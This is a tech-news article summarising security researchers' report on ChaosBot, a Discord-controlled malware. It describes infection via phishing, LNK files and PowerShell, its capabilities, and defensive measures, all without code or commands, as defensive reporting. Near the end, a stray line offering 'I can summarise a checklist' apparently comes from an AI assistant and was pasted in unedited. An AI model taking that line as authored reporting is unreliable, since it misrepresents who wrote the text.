Security

Discord Platform Exploited by New Data-Stealing Malware

By Ashwin Kumar
When you purchase through links on our site, we may earn an affiliate commission.
Discord Platform Exploited by New Data-Stealing Malware
Set AllTechNerd as Preferred source

Security researchers at eSentire have identified a new strain of malware—dubbed ChaosBot—that combines several modern tactics to establish persistent remote access on victims’ machines.

The campaign, first spotted in late September and aimed at financial-sector targets in Vietnam, uses a Rust-built payload and Discord as a command-and-control channel. Attackers leveraged stolen credentials (including a Cisco VPN account and an Active Directory privileged account) to deploy and spread the malware within victim environments.

Below is a clear, non-technical summary of what ChaosBot does, how it infects systems, and what organisations and users can do to detect and mitigate it.

How ChaosBot Infects Systems

  • Phishing lures: Attackers send messages that encourage users to open malicious files. The campaign uses common social-engineering tricks—e.g., a PDF that looks like official correspondence from a bank—to distract victims while the payload installs.
  • LNK shortcut + PowerShell: The initial delivery relies on malicious Windows shortcut files (LNK) that execute a PowerShell command to download and launch the malware.
  • Legitimate tool abuse: The malware drops a malicious DLL that is executed via a browser binary (Microsoft Edge in this campaign), helping it blend into normal process activity.
  • Credential misuse: Compromised VPN credentials and privileged AD accounts were used to move laterally and to seed the malware into corporate networks.

Key Capabilities

ChaosBot is multi-faceted and modular. Its observed capabilities include:

  • Discord-based C2: The operator uses a Discord server/channel to receive beacons (hostnames) and issue commands. This helps the operator blend C2 traffic with normal web activity.
  • Remote command execution: The malware can run shell commands on the infected host.
  • Data exfiltration: It can upload files and screenshots back to the attacker-controlled Discord channel.
  • Downloader functionality: ChaosBot can fetch and deploy additional payloads or tooling.
  • Alternate backdoors: Operators attempted to leverage tools like VS Code Tunnel as a secondary access method (researchers reported these attempts largely failed).
  • Ransom/harassment capabilities: A separate C++ variant was observed that can encrypt small files, target cryptocurrency data, and delete very large files to coerce victims into paying.

Why Discord?

Using mainstream platforms such as Discord for command-and-control gives attackers several conveniences:

  • Traffic can look similar to benign user activity.
  • Built-in messaging and file upload features make it easy to receive beacons and push new payloads.
  • Accounts and channels can be rapidly created and discarded.

Signs of Compromise (High-Level Indicators)

Watch for unusual behaviours such as:

  • LNK files arriving in email or file shares that trigger unexpected PowerShell activity.
  • Browser or edge-processes spawning unusual DLL loading or child processes.
  • Outbound traffic to Discord endpoints from servers or systems that shouldn’t be using Discord.
  • Unexpected file uploads to external services from workstations.
  • Unusual use of privileged accounts, anomalous VPN logins, or sudden AD modifications.

(Do not rely on these alone—investigate anomalous events contextually.)

Recommended Defensive Actions (for Organizations)

  1. Harden credentials and access:
    • Enforce strong, unique passwords plus multi-factor authentication for VPNs, remote access tools, and privileged AD accounts.
    • Rotate and revoke exposed credentials immediately.
  2. Restrict and monitor remote access:
    • Limit VPN access and administrative logins to the minimum necessary.
    • Apply conditional access rules and geofencing where appropriate.
    • Closely audit VPN and RDP sessions for odd timeframes or locations.
  3. Email and endpoint protection:
    • Tighten email filtering to block malicious attachments (especially LNKs) and phishing messages.
    • Configure endpoint detection and response (EDR) to catch script-based downloaders and unusual DLL injection behaviors.
  4. Network controls:
    • Monitor and, where reasonable, restrict traffic to consumer collaboration platforms (including Discord) from corporate networks or endpoints that should not use them.
    • Use proxy/next-gen firewall capabilities to detect uncommon uploads, tunnels, and outbound connections.
  5. Application allowlisting and process monitoring:
    • Use allowlisting to prevent unauthorised binaries from executing.
    • Monitor browsers and helper binaries for suspicious child processes or DLL loads.
  6. Backup and recovery readiness:
    • Maintain immutable backups and test restoration procedures regularly to recover from destructive or ransomware-like activity.
  7. Incident response and threat hunting:
    • Hunt for IOCs and behaviour patterns described above, and correlate logs from VPN, AD, EDR, and network devices.
    • If compromise is suspected, isolate affected hosts, collect forensic artifacts, and engage your IR team.
  8. User education:
    • Remind staff about the dangers of opening unexpected attachments or links, and train them to verify requests that involve credentials or file execution.

For Individuals

  • Be cautious with unexpected attachments—avoid opening LNK files or running downloaded scripts.
  • Keep operating systems, browsers, and antivirus/endpoint tools up to date.
  • Use MFA on all important accounts (VPN, email, cloud storage).
  • Report suspicious emails to your security team.

ChaosBot shows how threat actors combine social engineering, legitimate tooling, and mainstream platforms to complicate detection. Its use of Discord for C2 underscores the need to look beyond signature-based defences and to place emphasis on behavioural detection, credential hygiene, and network segmentation.

If you suspect an incident involving this or similar malware, treat it as urgent: contain affected systems, preserve logs and disk images for investigation, and notify relevant incident response resources. If you’d like, I can summarise a checklist you can distribute to IT teams for quick triage and containment steps (at a high level, without operational commands).

Source: eSentire

Share This Article
ByAshwin Kumar
Follow:
Ashwin is a seasoned financial journalist and content strategist with over 4 years of experience covering global markets, economic policy, and personal finance. He holds a Bachelor's degree in Economics from Northwestern University and earned a Chartered Financial Analyst designation in 2019.
Leave a Comment

Latest

Apple TV+ Rebranded to Apple TV
Apple TV+ Rebranded to Apple TV
Apple
Motorola Unveils Ultra Slim Moto X70
Motorola Unveils Ultra-Slim Moto X70 Air with Massive 4,800mAh Battery
SmartPhones
Apple TV Subscriber Count: 'Significantly More' Than 45 Million, Says Exec
Apple TV Subscriber Count: ‘Significantly More’ Than 45 Million, Says Exec
Apple
New OpenAI Evaluation Finds GPT-5 Is the "Least Biased"
New OpenAI Evaluation Finds GPT-5 Is the “Least Biased”
AI
Amazon Limited-Time Flash Sale - Unbelievable Deals Up to 70% Off

Related